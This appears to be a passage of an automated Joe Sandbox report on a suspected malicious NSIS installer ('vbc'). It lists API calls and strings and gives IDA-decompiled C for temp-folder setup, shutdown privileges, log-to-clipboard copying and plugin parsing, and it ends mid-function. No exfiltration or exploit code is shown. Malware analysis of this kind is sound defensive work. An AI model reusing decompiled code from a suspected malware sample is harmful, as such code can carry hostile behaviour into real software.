0x00403788
0x0040379b
0x0040379c
0x004037b1
0x004037b7
0x004037b9
0x004037bb
0x004037c3
0x004037c5
0x00000000
0x004037c5
0x004037bf
0x004037c1
0x004037e6
0x004037ea
0x004037f3
0x004037f8
0x004037fe
0x00403809
0x0040380b
0x00403810
0x00403812
0x0040386a
0x0040386f
0x00403878
0x0040387f
0x00403882
0x00403a59
0x00403a59
0x00403a5e
0x00403a67
0x00403a84
0x00403afc
0x00403afc
0x00403b04
0x00403b06
0x00403b06
0x00403b0c
0x00403b0c
0x00403a9b
0x00403aa7
0x00403ab8
0x00403abf
0x00403ac6
0x00403ac6
0x00403ace
0x00403ada
0x00403ae8
0x00403af3
0x00000000
0x00000000
0x00000000
0x00403adc
0x00403adc
0x00403add
0x00403adf
0x00403ae0
0x00403ae1
0x00403ae6
0x00403af5
0x00403af7
0x00000000
0x00403af7
0x00000000
0x00403ae6
0x00403ada
0x00403a71
0x00403a78
0x00403a78
0x0040388e
0x00403935
0x00403935
0x00403941
0x00000000
0x00403941
0x0040389f
0x004038a7
0x004038f9
0x004038f9
0x004038ff
0x00403906
0x00403954
0x00403956
0x0040395b
0x0040395d
0x00403965
0x00403965
0x00403970
0x0040397c
0x00403982
0x00403984
0x00403a57
0x00403a57
0x00403a57
0x00000000
0x0040398a
0x0040398a
0x0040398c
0x0040398d
0x00403996
0x0040398f
0x0040398f
0x0040398f
0x0040399c
0x004039a4
0x004039ab
0x004039b3
0x004039b3
0x004039c0
0x004039cc
0x004039d6
0x004039d6
0x004039d8
0x004039df
0x004039e9
0x004039f5
0x004039fb
0x00403a01
0x00403a04
0x00403a0e
0x00403a14
0x00403a16
0x00403a1a
0x00403a2b
0x00403a31
0x00403a36
0x00403a38
0x00403a3b
0x00403a41
0x00403a41
0x00403a38
0x00403a16
0x00403a44
0x00403a4b
0x00403a4b
0x00403a4b
0x00403a4b
0x00403a52
0x00000000
0x00403a52
0x00403984
0x00403908
0x0040390b
0x0040390f
0x00403914
0x00403916
0x00000000
0x00000000
0x00403922
0x0040392d
0x00403932
0x00000000
0x00403932
0x004038b0
0x004038c8
0x004038d9
0x004038da
0x004038de
0x004038e0
0x004038ee
0x004038f5
0x00000000
0x00000000
0x00000000
0x004038f5
0x004038f7
0x00000000
0x004038f7
0x0040381a
0x00403826
0x0040382b
0x00403830
0x00403832
0x00000000
0x00000000
0x0040383a
0x00403842
0x00403853
0x0040385b
0x0040385d
0x00403862
0x00403864
0x00000000
0x00000000
0x00000000
0x00403864
0x00000000
0x004037c1
0x0040376a
0x0040376c
0x00000000
0x00000000
0x0040376e
0x00403772
0x00403776
0x0040377d
0x0040377d
0x0040377d
0x0040377d
0x00000000
0x0040377d
0x00403778
0x0040377b
0x00000000
0x00000000
0x00000000
0x0040377b
0x00403714
0x00403718
0x0040371b
0x00403722
0x00403722
0x00000000
0x00403722
0x0040371d
0x00403720
0x00000000
0x00000000
0x00000000
0x00403720
0x00000000
0x00000000
0x00000000
0x004036ee
0x004036ee
0x004036ef
0x004036f0
0x004036f0
0x00000000
0x004036ee
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403550
GetVersionExW.KERNEL32(?), ref: 00403579
GetVersionExW.KERNEL32(0000011C), ref: 00403590
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
OleInitialize.OLE32(00000000), ref: 0040366A
SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
CharNextW.USER32(00000000), ref: 004036D6
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403809
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
lstrcatW.KERNEL32 ref: 00403826
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 0040383A
lstrcatW.KERNEL32 ref: 00403842
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
DeleteFileW.KERNELBASE(1033), ref: 0040386F
lstrcatW.KERNEL32 ref: 00403956
lstrcatW.KERNEL32 ref: 00403965

Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1

lstrcatW.KERNEL32 ref: 00403970
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00440000,00000000,?), ref: 0040397C
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
CopyFileW.KERNEL32(00443800,0042AA28,00000001), ref: 00403A0E
CloseHandle.KERNEL32(00000000), ref: 00403A3B
OleUninitialize.OLE32 ref: 00403A5E
ExitProcess.KERNEL32 ref: 00403A78
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
ExitProcess.KERNEL32 ref: 00403B0C

Strings

1033, xrefs: 0040386A
TMP, xrefs: 00403856
UXTHEME, xrefs: 0040361B, 00403620, 00403626
C:\Users\user\AppData\Local\Temp\, xrefs: 004037FE, 00403803, 00403819, 00403825, 00403834, 00403841, 0040384D, 00403855, 00403953, 00403964, 0040396F, 0040397B, 0040398C, 0040399B, 00403A51
Low, xrefs: 0040383C
\Temp, xrefs: 00403820
Error launching installer, xrefs: 004038FF
NSIS Error, xrefs: 0040368E
.tmp, xrefs: 0040396A
~nsu, xrefs: 0040394E
SeShutdownPrivilege, xrefs: 00403AA1
TEMP, xrefs: 0040384E

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-2607992671
Opcode ID: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
Opcode Fuzzy Hash: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x433ee4;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x42d268;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x433ecc == _t156) {
							ShowWindow( *0x434f08, 8);
							if( *0x434f8c == _t156) {
								_t119 =  *0x42c240; // 0x2916a4
								_t57 = _t119 + 0x34; // 0xffffffd6
								E0040559F( *_t57, _t156);
							}
							E00404472(_t171);
							goto L25;
						}
						 *0x42ba38 = 2;
						E00404472(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00404500(_a8, _a12, _a16);
						}
						ShowWindow( *0x433ed0, _t156);
						ShowWindow(_t169, 8);
						E004044CE(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x434f10;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x433ed0 = GetDlgItem(_a4, 0x403);
				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x433ee4 = _t134;
				_v8 = _t134;
				E004044CE( *0x433ed0);
				 *0x433ed4 = E00404E27(4);
				 *0x433eec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404499(_a4);
				if(( *0x434f18 & 0x00000003) != 0) {
					ShowWindow( *0x433ed0, _t156);
					if(( *0x434f18 & 0x00000002) != 0) {
						 *0x433ed0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044CE( *0x433ec8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x434f18 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x004056e6
0x004056ec
0x004056f6
0x004056f9
0x0040588f
0x004058ac
0x004058b3
0x004058b3
0x004058c6
0x004058e4
0x004058e6
0x004058ee
0x00405944
0x00405948
0x00000000
0x00000000
0x0040594a
0x00405950
0x00000000
0x00000000
0x0040595a
0x00405962
0x00405965
0x00405a67
0x00000000
0x00405a67
0x00405974
0x0040597f
0x00405988
0x00405993
0x00405996
0x0040599f
0x004059a5
0x004059a8
0x004059a8
0x004059c0
0x004059c9
0x004059cc
0x004059d3
0x004059da
0x004059e2
0x004059e2
0x004059f9
0x004059f9
0x00405a00
0x00405a06
0x00405a12
0x00405a19
0x00405a22
0x00405a24
0x00405a27
0x00405a36
0x00405a39
0x00405a3f
0x00405a40
0x00405a46
0x00405a47
0x00405a48
0x00405a50
0x00405a5b
0x00405a61
0x00405a61
0x00000000
0x004059c0
0x004058f6
0x00405926
0x0040592e
0x00405930
0x00405936
0x00405939
0x00405939
0x0040593f
0x00000000
0x0040593f
0x004058fa
0x00405904
0x00000000
0x004058c8
0x004058ce
0x00405909
0x00000000
0x00405912
0x004058d7
0x004058dc
0x004058df
0x00000000
0x004058df
0x004058c6
0x004056ff
0x00405703
0x0040570b
0x0040570f
0x00405712
0x00405715
0x00405718
0x0040571b
0x0040571c
0x0040571d
0x00405736
0x00405739
0x00405743
0x00405752
0x0040575a
0x00405762
0x00405767
0x0040576a
0x00405776
0x0040577f
0x00405788
0x004057aa
0x004057b0
0x004057c1
0x004057c6
0x004057d4
0x004057e2
0x004057e2
0x004057e7
0x004057f5
0x004057f5
0x004057fa
0x004057fd
0x00405802
0x0040580e
0x00405817
0x00405824
0x00405833
0x00405826
0x0040582b
0x0040582b
0x0040583f
0x0040583f
0x00405853
0x0040585c
0x00405865
0x00405875
0x00405881
0x00405881
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 0040573C
GetDlgItem.USER32(?,000003EE), ref: 0040574B
GetClientRect.USER32 ref: 00405788
GetSystemMetrics.USER32 ref: 0040578F
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
ShowWindow.USER32(00000000,?), ref: 00405817
ShowWindow.USER32(?,00000008), ref: 0040582B
GetDlgItem.USER32(?,000003EC), ref: 0040584C
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
GetDlgItem.USER32(?,000003F8), ref: 0040575A

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

GetDlgItem.USER32(?,000003EC), ref: 0040589E
CreateThread.KERNELBASE(00000000,00000000,Function_00005672,00000000), ref: 004058AC
CloseHandle.KERNELBASE(00000000), ref: 004058B3
ShowWindow.USER32(00000000), ref: 004058D7
ShowWindow.USER32(?,00000008), ref: 004058DC
ShowWindow.USER32(00000008), ref: 00405926
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
CreatePopupMenu.USER32 ref: 0040596B
AppendMenuW.USER32 ref: 0040597F
GetWindowRect.USER32 ref: 0040599F
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
OpenClipboard.USER32(00000000), ref: 00405A00
EmptyClipboard.USER32 ref: 00405A06
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
GlobalLock.KERNEL32 ref: 00405A1C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
GlobalUnlock.KERNEL32(00000000), ref: 00405A50
SetClipboardData.USER32 ref: 00405A5B
CloseClipboard.USER32 ref: 00405A61

Strings

{, xrefs: 00405944

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 73281BFF Relevance: 20.1, APIs: 13, Instructions: 597
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E73281BFF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t208;
				signed int _t211;
				void* _t213;
				void* _t215;
				WCHAR* _t217;
				void* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t229;
				signed short _t231;
				struct HINSTANCE__* _t234;
				struct HINSTANCE__* _t236;
				void* _t237;
				intOrPtr* _t238;
				void* _t249;
				signed char _t250;
				signed int _t251;
				void* _t255;
				struct HINSTANCE__* _t257;
				void* _t258;
				signed int _t260;
				signed int _t261;
				signed short* _t264;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed int _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed short _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed short* _t321;
				WCHAR* _t322;
				WCHAR* _t324;
				WCHAR* _t325;
				struct HINSTANCE__* _t326;
				void* _t328;
				signed int _t331;
				void* _t332;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t332 = 0;
				_v52 = 0;
				_v44 = 0;
				_t208 = E732812BB();
				_v24 = _t208;
				_v28 = _t208;
				_v48 = E732812BB();
				_t321 = E732812E3();
				_v56 = _t321;
				_v12 = _t321;
				while(1) {
					_t211 = _v32;
					_v60 = _t211;
					if(_t211 != _t283 && _t332 == _t283) {
						break;
					}
					_t286 =  *_t321 & 0x0000ffff;
					_t213 = _t286 - _t283;
					if(_t213 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t215 = _v60 - _t283;
						if(_t215 == 0) {
							__eflags = _t332 - _t283;
							 *_v28 = _t283;
							if(_t332 == _t283) {
								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t332 = _t255;
								 *(_t332 + 0x1010) = _t283;
								 *(_t332 + 0x1014) = _t283;
							}
							_t287 = _v36;
							_t47 = _t332 + 8; // 0x8
							_t217 = _t47;
							_t48 = _t332 + 0x808; // 0x808
							_t322 = _t48;
							 *_t332 = _t287;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *_t217 = _t283;
							 *_t322 = _t283;
							 *(_t332 + 0x1008) = _t283;
							 *(_t332 + 0x100c) = _t283;
							 *(_t332 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t328 = 0;
								GlobalFree(_t332);
								_t332 = E732813B1(_v24);
								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E7328162F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = _t286;
									while(1) {
										__eflags = _t261 - 0x22;
										if(_t261 != 0x22) {
											break;
										}
										_t321 =  &(_t321[1]);
										__eflags = _v44 - _t283;
										_v12 = _t321;
										if(_v44 == _t283) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t321;
											L58:
											_t331 =  &(_t321[1]);
											__eflags = _t331;
											_v12 = _t331;
											goto L59;
										}
										_t261 =  *_t321 & 0x0000ffff;
										_v44 = _t283;
									}
									__eflags = _t261 - 0x2a;
									if(_t261 == 0x2a) {
										_v36 = 2;
										L57:
										_t321 = _v12;
										_v28 = _v24;
										_t283 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t261 - 0x2d;
									if(_t261 == 0x2d) {
										L151:
										_t304 =  *_t321;
										__eflags = _t304 - 0x2d;
										if(_t304 != 0x2d) {
											L154:
											_t264 =  &(_t321[1]);
											__eflags =  *_t264 - 0x3a;
											if( *_t264 != 0x3a) {
												goto L162;
											}
											__eflags = _t304 - 0x2d;
											if(_t304 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t264;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 = _t283;
											} else {
												 *_v28 = _t283;
												lstrcpyW(_v48, _v24);
											}
											goto L57;
										}
										_t264 =  &(_t321[1]);
										__eflags =  *_t264 - 0x3e;
										if( *_t264 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t261 - 0x3a;
									if(_t261 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t269 = _t260 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									L80:
									_t305 = _t286 + 0xffffffde;
									__eflags = _t305 - 0x55;
									if(_t305 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t305 + 0x732823e8) & 0x000000ff) * 4 +  &M7328235C))) {
										case 0:
											__ecx = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												L131:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
												if( *((intOrPtr*)(__edi + 2)) != __dx) {
													L136:
													 *__ecx =  *__ecx & 0x00000000;
													__eax = E732812CC(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __ax;
												if(__ax == 0) {
													goto L136;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__edi = __edi + 1;
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__ax =  *__edi;
												 *__ecx =  *__edi;
												__ecx = __ecx + 1;
												__ecx = __ecx + 1;
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 2;
											__ebx = E732812BB();
											 &_v12 = E73281B86( &_v12);
											__eax = E73281510(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E73281B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t271 =  *(_t332 + 0x1014);
											__eflags = _t271 - _v16;
											if(_t271 > _v16) {
												_v16 = _t271;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t271 - (_v36 == 3);
											if(_t271 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E73281B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
